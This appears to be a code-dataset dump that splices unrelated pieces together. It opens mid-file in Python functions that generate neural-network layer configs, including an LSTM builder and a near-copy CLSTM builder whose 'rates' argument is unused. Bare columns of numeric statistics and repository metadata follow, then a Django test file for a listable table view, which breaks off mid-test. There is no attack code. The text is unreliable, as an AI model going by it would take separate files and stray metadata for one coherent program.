components.append("component name={0}_relu type=RectifiedLinearComponent dim={1}".format(name, output_dim))
components.append("component name={0}_renorm type=NormalizeComponent dim={1}".format(name, output_dim))
component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
component_nodes.append("component-node name={0}_relu component={0}_relu input={0}_affine".format(name))
component_nodes.append("component-node name={0}_renorm component={0}_renorm input={0}_relu".format(name))
return {'descriptor': '{0}_renorm'.format(name),
'dimension': output_dim}
def AddSoftmaxLayer(config_lines, name, input):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append("component name={0}_log_softmax type=LogSoftmaxComponent dim={1}".format(name, input['dimension']))
component_nodes.append("component-node name={0}_log_softmax component={0}_log_softmax input={1}".format(name, input['descriptor']))
return {'descriptor': '{0}_log_softmax'.format(name),
'dimension': input['dimension']}
def AddOutputNode(config_lines, input, label_delay=None):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
if label_delay is None:
component_nodes.append('output-node name=output input={0}'.format(input['descriptor']))
else:
component_nodes.append('output-node name=output input=Offset({0},{1})'.format(input['descriptor'], label_delay))
def AddFinalLayer(config_lines, input, output_dim, ng_affine_options = "", label_delay=None, include_softmax = "true"):
prev_layer_output = AddAffineLayer(config_lines, "Final", input, output_dim, ng_affine_options)
if include_softmax == "true":
prev_layer_output = AddSoftmaxLayer(config_lines, "Final", prev_layer_output)
AddOutputNode(config_lines, prev_layer_output, label_delay)
def AddLstmLayer(config_lines,
name, input, cell_dim,
recurrent_projection_dim = 0,
non_recurrent_projection_dim = 0,
clipping_threshold = 1.0,
norm_based_clipping = "false",
ng_per_element_scale_options = "",
ng_affine_options = "",
lstm_delay = -1):
assert(recurrent_projection_dim >= 0 and non_recurrent_projection_dim >= 0)
components = config_lines['components']
component_nodes = config_lines['component-nodes']
input_descriptor = input['descriptor']
input_dim = input['dimension']
name = name.strip()
if (recurrent_projection_dim == 0):
add_recurrent_projection = False
recurrent_projection_dim = cell_dim
recurrent_connection = "m_t"
else:
add_recurrent_projection = True
recurrent_connection = "r_t"
if (non_recurrent_projection_dim == 0):
add_non_recurrent_projection = False
else:
add_non_recurrent_projection = True
# Natural gradient per element scale parameters
ng_per_element_scale_options += " param-mean=0.0 param-stddev=1.0 "
# Parameter Definitions W*(* replaced by - to have valid names)
components.append("# Input gate control : W_i* matrices")
components.append("component name={0}_W_i-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
components.append("# note : the cell outputs pass through a diagonal matrix")
components.append("component name={0}_w_ic type=NaturalGradientPerElementScaleComponent dim={1} {2}".format(name, cell_dim, ng_per_element_scale_options))
components.append("# Forget gate control : W_f* matrices")
components.append("component name={0}_W_f-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
components.append("# note : the cell outputs pass through a diagonal matrix")
components.append("component name={0}_w_fc type=NaturalGradientPerElementScaleComponent dim={1} {2}".format(name, cell_dim, ng_per_element_scale_options))
components.append("# Output gate control : W_o* matrices")
components.append("component name={0}_W_o-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
components.append("# note : the cell outputs pass through a diagonal matrix")
components.append("component name={0}_w_oc type=NaturalGradientPerElementScaleComponent dim={1} {2}".format(name, cell_dim, ng_per_element_scale_options))
components.append("# Cell input matrices : W_c* matrices")
components.append("component name={0}_W_c-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
components.append("# Defining the non-linearities")
components.append("component name={0}_i type=SigmoidComponent dim={1}".format(name, cell_dim))
components.append("component name={0}_f type=SigmoidComponent dim={1}".format(name, cell_dim))
components.append("component name={0}_o type=SigmoidComponent dim={1}".format(name, cell_dim))
components.append("component name={0}_g type=TanhComponent dim={1}".format(name, cell_dim))
components.append("component name={0}_h type=TanhComponent dim={1}".format(name, cell_dim))
components.append("# Defining the cell computations")
components.append("component name={0}_c1 type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
components.append("component name={0}_c2 type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
components.append("component name={0}_m type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
components.append("component name={0}_c type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, cell_dim, clipping_threshold, norm_based_clipping))
# c1_t and c2_t defined below
component_nodes.append("component-node name={0}_c_t component={0}_c input=Sum({0}_c1_t, {0}_c2_t)".format(name))
c_tminus1_descriptor = "IfDefined(Offset({0}_c_t, {1}))".format(name, lstm_delay)
component_nodes.append("# i_t")
component_nodes.append("component-node name={0}_i1 component={0}_W_i-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_i2 component={0}_w_ic input={1}".format(name, c_tminus1_descriptor))
component_nodes.append("component-node name={0}_i_t component={0}_i input=Sum({0}_i1, {0}_i2)".format(name))
component_nodes.append("# f_t")
component_nodes.append("component-node name={0}_f1 component={0}_W_f-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_f2 component={0}_w_fc input={1}".format(name, c_tminus1_descriptor))
component_nodes.append("component-node name={0}_f_t component={0}_f input=Sum({0}_f1,{0}_f2)".format(name))
component_nodes.append("# o_t")
component_nodes.append("component-node name={0}_o1 component={0}_W_o-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_o2 component={0}_w_oc input={0}_c_t".format(name))
component_nodes.append("component-node name={0}_o_t component={0}_o input=Sum({0}_o1, {0}_o2)".format(name))
component_nodes.append("# h_t")
component_nodes.append("component-node name={0}_h_t component={0}_h input={0}_c_t".format(name))
component_nodes.append("# g_t")
component_nodes.append("component-node name={0}_g1 component={0}_W_c-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_g_t component={0}_g input={0}_g1".format(name))
component_nodes.append("# parts of c_t")
component_nodes.append("component-node name={0}_c1_t component={0}_c1 input=Append({0}_f_t, {1})".format(name, c_tminus1_descriptor))
component_nodes.append("component-node name={0}_c2_t component={0}_c2 input=Append({0}_i_t, {0}_g_t)".format(name))
component_nodes.append("# m_t")
component_nodes.append("component-node name={0}_m_t component={0}_m input=Append({0}_o_t, {0}_h_t)".format(name))
# add the recurrent connections
if (add_recurrent_projection and add_non_recurrent_projection):
components.append("# projection matrices : Wrm and Wpm")
components.append("component name={0}_W-m type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, cell_dim, recurrent_projection_dim + non_recurrent_projection_dim, ng_affine_options))
components.append("component name={0}_r type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, recurrent_projection_dim, clipping_threshold, norm_based_clipping))
component_nodes.append("# r_t and p_t")
component_nodes.append("component-node name={0}_rp_t component={0}_W-m input={0}_m_t".format(name))
component_nodes.append("dim-range-node name={0}_r_t_preclip input-node={0}_rp_t dim-offset=0 dim={1}".format(name, recurrent_projection_dim))
component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_r_t_preclip".format(name))
output_descriptor = '{0}_rp_t'.format(name)
output_dim = recurrent_projection_dim + non_recurrent_projection_dim
elif add_recurrent_projection:
components.append("# projection matrices : Wrm")
components.append("component name={0}_Wrm type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, cell_dim, recurrent_projection_dim, ng_affine_options))
components.append("component name={0}_r type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, recurrent_projection_dim, clipping_threshold, norm_based_clipping))
component_nodes.append("# r_t")
component_nodes.append("component-node name={0}_r_t_preclip component={0}_Wrm input={0}_m_t".format(name))
component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_r_t_preclip".format(name))
output_descriptor = '{0}_r_t'.format(name)
output_dim = recurrent_projection_dim
else:
components.append("component name={0}_r type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, cell_dim, clipping_threshold, norm_based_clipping))
component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_m_t".format(name))
output_descriptor = '{0}_r_t'.format(name)
output_dim = cell_dim
return {
'descriptor': output_descriptor,
'dimension':output_dim
}
def AddClstmLayer(config_lines,
name, input, cell_dim,
recurrent_projection_dim = 0,
non_recurrent_projection_dim = 0,
clipping_threshold = 1.0,
norm_based_clipping = "false",
ng_per_element_scale_options = "",
ng_affine_options = "",
lstm_delay = -1,
rates = [1]):
assert(recurrent_projection_dim >= 0 and non_recurrent_projection_dim >= 0)
components = config_lines['components']
component_nodes = config_lines['component-nodes']
input_descriptor = input['descriptor']
input_dim = input['dimension']
name = name.strip()
if (recurrent_projection_dim == 0):
add_recurrent_projection = False
recurrent_projection_dim = cell_dim
recurrent_connection = "m_t"
else:
add_recurrent_projection = True
recurrent_connection = "r_t"
if (non_recurrent_projection_dim == 0):
add_non_recurrent_projection = False
else:
add_non_recurrent_projection = True
# Natural gradient per element scale parameters
ng_per_element_scale_options += " param-mean=0.0 param-stddev=1.0 "
# Parameter Definitions W*(* replaced by - to have valid names)
components.append("# Input gate control : W_i* matrices")
components.append("component name={0}_W_i-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
components.append("# note : the cell outputs pass through a diagonal matrix")
components.append("component name={0}_w_ic type=NaturalGradientPerElementScaleComponent dim={1} {2}".format(name, cell_dim, ng_per_element_scale_options))
components.append("# Forget gate control : W_f* matrices")
components.append("component name={0}_W_f-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
components.append("# note : the cell outputs pass through a diagonal matrix")
components.append("component name={0}_w_fc type=NaturalGradientPerElementScaleComponent dim={1} {2}".format(name, cell_dim, ng_per_element_scale_options))
components.append("# Output gate control : W_o* matrices")
components.append("component name={0}_W_o-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
components.append("# note : the cell outputs pass through a diagonal matrix")
components.append("component name={0}_w_oc type=NaturalGradientPerElementScaleComponent dim={1} {2}".format(name, cell_dim, ng_per_element_scale_options))
components.append("# Cell input matrices : W_c* matrices")
components.append("component name={0}_W_c-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
components.append("# Defining the non-linearities")
components.append("component name={0}_i type=SigmoidComponent dim={1}".format(name, cell_dim))
components.append("component name={0}_f type=SigmoidComponent dim={1}".format(name, cell_dim))
components.append("component name={0}_o type=SigmoidComponent dim={1}".format(name, cell_dim))
components.append("component name={0}_g type=TanhComponent dim={1}".format(name, cell_dim))
components.append("component name={0}_h type=TanhComponent dim={1}".format(name, cell_dim))
components.append("# Defining the cell computations")
components.append("component name={0}_c1 type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
components.append("component name={0}_c2 type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
components.append("component name={0}_m type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
components.append("component name={0}_c type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, cell_dim, clipping_threshold, norm_based_clipping))
# c1_t and c2_t defined below
component_nodes.append("component-node name={0}_c_t component={0}_c input=Sum({0}_c1_t, {0}_c2_t)".format(name))
c_tminus1_descriptor = "IfDefined(Offset({0}_c_t, {1}))".format(name, lstm_delay)
component_nodes.append("# i_t")
component_nodes.append("component-node name={0}_i1 component={0}_W_i-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_i2 component={0}_w_ic input={1}".format(name, c_tminus1_descriptor))
component_nodes.append("component-node name={0}_i_t component={0}_i input=Sum({0}_i1, {0}_i2)".format(name))
component_nodes.append("# f_t")
component_nodes.append("component-node name={0}_f1 component={0}_W_f-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_f2 component={0}_w_fc input={1}".format(name, c_tminus1_descriptor))
component_nodes.append("component-node name={0}_f_t component={0}_f input=Sum({0}_f1,{0}_f2)".format(name))
component_nodes.append("# o_t")
component_nodes.append("component-node name={0}_o1 component={0}_W_o-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_o2 component={0}_w_oc input={0}_c_t".format(name))
component_nodes.append("component-node name={0}_o_t component={0}_o input=Sum({0}_o1, {0}_o2)".format(name))
component_nodes.append("# h_t")
component_nodes.append("component-node name={0}_h_t component={0}_h input={0}_c_t".format(name))
component_nodes.append("# g_t")
component_nodes.append("component-node name={0}_g1 component={0}_W_c-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_g_t component={0}_g input={0}_g1".format(name))
component_nodes.append("# parts of c_t")
component_nodes.append("component-node name={0}_c1_t component={0}_c1 input=Append({0}_f_t, {1})".format(name, c_tminus1_descriptor))
component_nodes.append("component-node name={0}_c2_t component={0}_c2 input=Append({0}_i_t, {0}_g_t)".format(name))
component_nodes.append("# m_t")
component_nodes.append("component-node name={0}_m_t component={0}_m input=Append({0}_o_t, {0}_h_t)".format(name))
# add the recurrent connections
if (add_recurrent_projection and add_non_recurrent_projection):
components.append("# projection matrices : Wrm and Wpm")
components.append("component name={0}_W-m type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, cell_dim, recurrent_projection_dim + non_recurrent_projection_dim, ng_affine_options))
components.append("component name={0}_r type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, recurrent_projection_dim, clipping_threshold, norm_based_clipping))
component_nodes.append("# r_t and p_t")
component_nodes.append("component-node name={0}_rp_t component={0}_W-m input={0}_m_t".format(name))
component_nodes.append("dim-range-node name={0}_r_t_preclip input-node={0}_rp_t dim-offset=0 dim={1}".format(name, recurrent_projection_dim))
component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_r_t_preclip".format(name))
output_descriptor = '{0}_rp_t'.format(name)
output_dim = recurrent_projection_dim + non_recurrent_projection_dim
elif add_recurrent_projection:
components.append("# projection matrices : Wrm")
components.append("component name={0}_Wrm type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, cell_dim, recurrent_projection_dim, ng_affine_options))
components.append("component name={0}_r type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, recurrent_projection_dim, clipping_threshold, norm_based_clipping))
component_nodes.append("# r_t")
component_nodes.append("component-node name={0}_r_t_preclip component={0}_Wrm input={0}_m_t".format(name))
component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_r_t_preclip".format(name))
output_descriptor = '{0}_r_t'.format(name)
output_dim = recurrent_projection_dim
else:
components.append("component name={0}_r type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, cell_dim, clipping_threshold, norm_based_clipping))
component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_m_t".format(name))
output_descriptor = '{0}_r_t'.format(name)
output_dim = cell_dim
return {
'descriptor': output_descriptor,
'dimension':output_dim
}
| 65.505682
| 219
| 0.72825
| 3,175
| 23,058
| 5.014488
| 0.055118
| 0.069091
| 0.087934
| 0.087432
| 0.922681
| 0.920545
| 0.899755
| 0.890836
| 0.882608
| 0.870611
| 0
| 0.022837
| 0.13401
| 23,058
| 351
| 220
| 65.692308
| 0.774489
| 0.017348
| 0
| 0.817518
| 0
| 0.189781
| 0.409848
| 0.102274
| 0
| 0
| 0
| 0
| 0.007299
| 1
| 0.032847
| false
| 0.021898
| 0.021898
| 0
| 0.080292
| 0.007299
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
877204df4c5895f120b1c3ab75caef019805c5c1
| 13,431
|
py
|
Python
|
tests/test_views.py
|
randlet/django-listable
|
545b460b22238bcbabbb11e9b5b9255f3df696ca
|
[
"BSD-3-Clause"
] | 11
|
2015-03-25T01:35:44.000Z
|
2021-05-11T14:17:24.000Z
|
tests/test_views.py
|
randlet/django-listable
|
545b460b22238bcbabbb11e9b5b9255f3df696ca
|
[
"BSD-3-Clause"
] | 7
|
2015-11-21T15:01:37.000Z
|
2021-09-03T13:37:13.000Z
|
tests/test_views.py
|
randlet/django-listable
|
545b460b22238bcbabbb11e9b5b9255f3df696ca
|
[
"BSD-3-Clause"
] | 7
|
2016-02-14T15:56:41.000Z
|
2021-04-23T08:41:15.000Z
|
import codecs
import datetime
import json
import sys
from django.db.models import Q
from django.test import Client, TestCase
from django.urls import reverse
from django.utils import timezone
from listable import settings as lisettings
from staff.models import INACTIVE, Staff
sys.path.append("listable-demo")
_reader = codecs.getreader("utf-8")
class TestViews(TestCase):
fixtures = ["staff_data.json"]
def test_basic_get(self):
client = Client()
response = client.get(reverse("staff-list"))
self.assertEqual(response.status_code, 200)
def test_data_load(self):
# full query = "sEcho=1&iColumns=8&sColumns=&iDisplayStart=10&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=0&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&_=1414439607636"
client = Client()
num_records = 23
response = client.get(reverse("staff-list")+"?sEcho=1&iColumns=8&sColumns=&iDisplayStart=1&iDisplayLength={0}".format(num_records),
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
str_response = response.content.decode('utf-8')
payload = json.loads(str_response)
data = payload.pop("aaData")
self.assertEqual(len(data), num_records)
self.assertEqual(payload['iTotalRecords'], Staff.objects.count())
def test_filter_select(self):
"""Test filtering based on a select widget"""
client = Client()
url = reverse("staff-list")+"?sEcho=1&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=inactive&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=0&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607637"
response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
payload = json.loads(response.content.decode('utf-8'))
data = payload.pop("aaData")
num_records = Staff.objects.filter(active=INACTIVE).count()
self.assertEqual(len(data), num_records)
def test_filter_extra_select(self):
"""Test filtering based on a extra clause (e.g. for Generic Foreign Key content)"""
client = Client()
search_term = "a3"
url = reverse("staff-list")+"?sEcho=1&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7={search_term}&bRegex_7=false&bSearchable_7=true&iSortingCols=0&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607640".format(search_term=search_term)
response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
payload = json.loads(response.content.decode('utf-8'))
data = payload.pop("aaData")
num_records = len([1 for s in Staff.objects.all() if search_term in s.generic_object.name.lower()])
self.assertTrue(len(data) > 0)
self.assertEqual(payload["iTotalDisplayRecords"], num_records)
def test_filter_multi_select(self):
"""Test filtering base on a select_mulit widget"""
client = Client()
url = reverse("staff-list") + "?sEcho=7&iColumns=10&sColumns=&iDisplayStart=0&iDisplayLength=100&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&mDataProp_8=8&mDataProp_9=9&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&sSearch_8=&bRegex_8=false&bSearchable_8=true&sSearch_9=%5E(Other%7CPart%2520Time%2520Contract)%24&bRegex_9=true&bSearchable_9=true&iSortCol_0=1&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&sRangeSeparator=~&_=1467142887399"
response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
payload = json.loads(response.content.decode('utf-8'))
data = payload.pop("aaData")
num_records = Staff.objects.filter(Q(contract_type__name="Other") | Q(contract_type__name="Part Time Contract")).count()
self.assertEqual(len(data), num_records)
def test_filter_date(self):
"""Test filtering base on a select_mulit widget"""
cur_tz = timezone.get_current_timezone()
test_date = '2010-06-10 12:34:56'
test_staff = Staff.objects.get(pk=10)
test_date_obj = cur_tz.localize(datetime.datetime.strptime(test_date, '%Y-%m-%d %H:%M:%S'))
test_staff.date_hired = test_date_obj
test_staff.save()
client = Client()
url = reverse("staff-list") + "?sEcho=5&iColumns=11&sColumns=&iDisplayStart=0&iDisplayLength=100&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&mDataProp_8=8&mDataProp_9=9&mDataProp_10=10&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&sSearch_8=&bRegex_8=false&bSearchable_8=true&sSearch_9=%5E(.*)%24&bRegex_9=true&bSearchable_9=true&sSearch_10=10+Jun+2010&bRegex_10=false&bSearchable_10=true&iSortCol_0=1&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&bSortable_10=true&sRangeSeparator=~&_=1467146526014"
response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
payload = json.loads(response.content.decode('utf-8'))
data = payload.pop("aaData")
num_records = Staff.objects.filter(date_hired__range=[test_date_obj.replace(hour=0, minute=0, second=0), test_date_obj.replace(hour=23, minute=59, second=59)]).count()
self.assertEqual(len(data), num_records)
def test_filter_plain(self):
"""Test filtering based on a plain text input"""
client = Client()
search_term = "Amet"
url = reverse("staff-list")+"?sEcho=1&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3={search_term}&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=0&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607643".format(search_term=search_term)
response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
payload = json.loads(response.content.decode('utf-8'))
data = payload.pop("aaData")
num_records = Staff.objects.filter(department__name=search_term).count()
self.assertTrue(len(data) > 0)
self.assertEqual(payload["iTotalDisplayRecords"], num_records)
def test_filter_iterable(self):
"""Test filtering based on a plain text input"""
client = Client()
search_term = "Abbott"
url = reverse("staff-list")+"?sEcho=19&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1={search_term}&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=0&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607645".format(search_term=search_term)
response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
payload = json.loads(response.content.decode('utf-8'))
data = payload.pop("aaData")
num_records = Staff.objects.filter(last_name=search_term).count()
self.assertTrue(len(data) > 0)
self.assertEqual(payload["iTotalDisplayRecords"], num_records)
def test_order_basic_with_search(self):
"""Test basic ordered results with a filter"""
client = Client()
search_term = "Maiores"
url = reverse("staff-list")+"?sEcho=19&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4={search_term}&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=1&iSortCol_0=0&sSortDir_0=desc&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607645".format(search_term=search_term)
response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
payload = json.loads(response.content.decode('utf-8'))
data = payload.pop("aaData")
pks = Staff.objects.filter(position__name=search_term).order_by('-pk').values_list("pk", flat=True)[:lisettings.LISTABLE_PAGINATE_BY]
payload_pks = [int(x[0]) for x in data]
self.assertListEqual(list(pks), payload_pks)
def test_order_iterable_with_search(self):
"""Test that filtering fails"""
client = Client()
search_term = "Maiores"
